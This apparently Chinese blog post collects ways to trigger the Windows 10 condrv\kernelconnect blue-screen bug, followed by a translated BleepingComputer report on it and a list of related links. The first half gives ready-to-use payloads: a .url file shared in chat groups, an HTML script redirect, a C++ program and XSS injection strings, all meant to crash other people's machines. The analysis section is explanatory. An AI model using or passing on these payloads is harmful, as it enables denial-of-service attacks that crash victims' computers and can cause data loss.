Windows蓝屏漏洞(利用多种途径与分析)
可使用途径:微信制作.url文件或其他文件,地址栏直接访问,做成html,exe等文件,xss利用等
url文件制作:https://baijiahao.baidu.com/s?id=1553137529313837&wfr=spider&for=pc
url文件内核心代码为:file:///globalroot/device/condrv/kernelconnect
通过微信等软件直接发群里.url的文件可直接触发访问(微信已修复)
直接浏览器地址栏(除ie浏览器)访问:\\.\globalroot\device\condrv\kernelconnect
html代码文件
<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>
exe代码文件
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){ WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}
xss漏洞利用
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>
分析():
看报错为:system_service_exception
造成这个报错的官方反馈是:系统服务错误
在国外Bleepingcomputer论坛,我们看到一篇这样的文章:
https://www.bleepingcomputer.com/news/security/windows-10-bug-crashes-your-pc-when-you-access-this-location/
文章指出:
自10月以来,Windows安全研究员 Jonas Lykkegaard 在推特上发表了很多次推文,讲述了一条路径,该路径会立即导致Windows 10崩溃并在进入Chrome地址栏中时显示BSOD。
当开发人员想要直接与Windows设备进行交互时,他们可以将Win32设备命名空间路径作为各种Windows编程功能的参数传递。例如,这允许应用程序直接与物理磁盘进行交互,而无需通过文件系统。
Lykkegaard告诉BleepingComputer,他发现了“控制台多路复用器驱动程序”的以下Win32设备名称空间路径,他认为该路径用于“内核/用户模式ipc”。当以各种方式打开路径时,即使来自低特权用户,也会导致Windows 10崩溃。
\\.\globalroot\device\condrv\kernelconnect
连接到该设备时,开发人员应传递“ attach”扩展属性以与该设备正确通信。
Lykkegaard发现,如果由于不正确的错误检查而尝试不通过属性而连接到路径,则会导致异常,从而导致Windows 10中的蓝屏死机(BSOD)崩溃。
更糟糕的是,特权低的Windows用户可以尝试使用此路径连接到设备,从而使计算机上执行的任何程序都很容易崩溃Windows 10。
在我们的测试中,我们已经确认此错误在Windows 10 1709版和更高版本中存在。BleepingComputer无法在早期版本中对其进行测试。
BleepingComputer上周与Microsoft联系,以了解他们是否已经知道该错误以及是否会修复该错误。
微软发言人对BleepingComputer表示:“微软对调查已报告的安全问题的客户承诺,我们将尽快为受影响的设备提供更新。”
Windows蓝屏漏洞(利用多种途径与分析)相关推荐
- 第7篇:MS12-020蓝屏漏洞在实战中的巧用
Part1 前言 大家好,上期分享了一篇Shiro Oracle Padding反序列化漏洞无key的实战文章,这期讲一个MS12-020蓝屏漏洞的真实利用过程.这个案例源于2013年我在读研期间 ...
- Windows蓝屏(Beginning Dump of Physical Memory)
为什么Windows 2000/XP会蓝屏? NT内核的操作系统采用的是分层管理结构(层又称为模式),主要有用户层(User Mode)和内核层(Kernel Mode),我们可以通过下面这个形象的比 ...
- 《英雄联盟》出现大面积闪退;两名 95 后大学生用脑电波写“福”字;Windows蓝屏为什么是蓝底白字? | 极客头条...
「极客头条」-- 技术人员的新闻圈! CSDN 的读者朋友们早上好哇,「极客头条」来啦,快来看今天都有哪些值得我们技术人关注的重要新闻吧. 整理 | 丁恩华 出品 | CSDN(ID:CSDNnews ...
- Windows蓝屏代码含义速查
一.蓝屏含义 1.故障检查信息 ***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4) KMODE_EXCEPTION_NOT_H ...
- windows 蓝屏 BCCode代码解释
一.软件引起的"蓝屏"故障 1.重要文件损坏或丢失会引起"蓝屏"故障(包括病毒所致). WIN中VxD(虚拟设备驱动程序)或.DLL(动态连接库)之类的重要文件 ...
- windows蓝屏错误小全
作者:siyizhu 日期:2005-11-27 字体大小: 小 中 大 引用内容 0 0x00000000 作业完成. 1 0x00000001 不正确的函数. 2 0x00000002 系统 ...
- 极客日报:《英雄联盟》出现大面积闪退 Bug;维基百科 CEO 即将卸任;揭秘Windows 蓝屏为什么是蓝底白字...
一.互联网快讯 1.天津大学两名 95 后,用脑电波写"福"字 两名天津大学的 95 后大学生,用脑电波操控"哪吒"多脑协控智臂系统写了个"福&quo ...
- 极客日报第 68 期:《英雄联盟》出现大面积闪退 Bug;维基百科 CEO 即将卸任;揭秘Windows 蓝屏为什么是蓝底白字
文章目录 一.互联网快讯 二.程序员专属 三.Github 每日精选 四.CSDN 社区优质博文精选 一.互联网快讯 1.天津大学两名 95 后,用脑电波写"福"字 两名天津大学的 ...
- 永恒之蓝ms17-010漏洞利用复现
一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...
- WINDOWS蓝屏解决对策
1.重启 有时只是某个程序或驱动程序一时犯错,重启后他们会改过自新.(注意此时参见7.查询停机码) 2.新硬件 首先应该检查新硬件是否插牢,这个被许多人忽视的问题往往会引发许多莫名 ...
最新文章
- python - DBUtils 连接池减少oracle数据库的连接数
- linux arm current_thread_info定义,linux中arm/mips架构current_thread_info定义
- jdk8 Function
- 使用OTA绕过AppStore安装App
- 代码重构之道,重构即重生,让你的代码起死回生
- centos7 rpm 安装 rabbitMQ 最新版
- Linux Shell笔记1 shell编程基础
- 破解云数据库MongoDB运行变慢指南
- PHP - 简单获取页面内容
- 组态王的日历时间控件脚本
- 使用Depix进行马赛克的消除测试
- 安装idea社区版并开发JavaWeb项目
- python可能实现办公自动化吗,让工作化繁为简:用Python实现办公自动化
- 新浪微博PC端登陆js分析及Python实现微博post登陆
- 小心被举报!考研复试后不要分享考试内容!
- 现货K线图知识之五:北坡炮兵并排跑
- JS实现简单的登录注册页签
- OV7725摄像头的彩色图像采集原理与液晶显示《一》
- Bootstrap5 弹出框
- IOS上传app store审核截图规格要求
热门文章
- 苹果CMS火车头采集发布模块教程
- 163邮箱提示: 535 Error: authentication failed
- 河南省第六届ACM程序设计大赛(共7道,目前只做了三道。待续)
- firefox flash
- 电脑主板线路连接图解_主板接线图解
- mysql中可以查询英文却查不了中文或数字
- (莫队算法)CodeForces - 617E XOR and Favorite Number
- 利用自带QuickTime Player录制mac内部声音
- 如何利用 HBuilderX 制作图文混排的网页
- linux磁盘文件检查修复工具下载,Linux磁盘坏道的检测及修复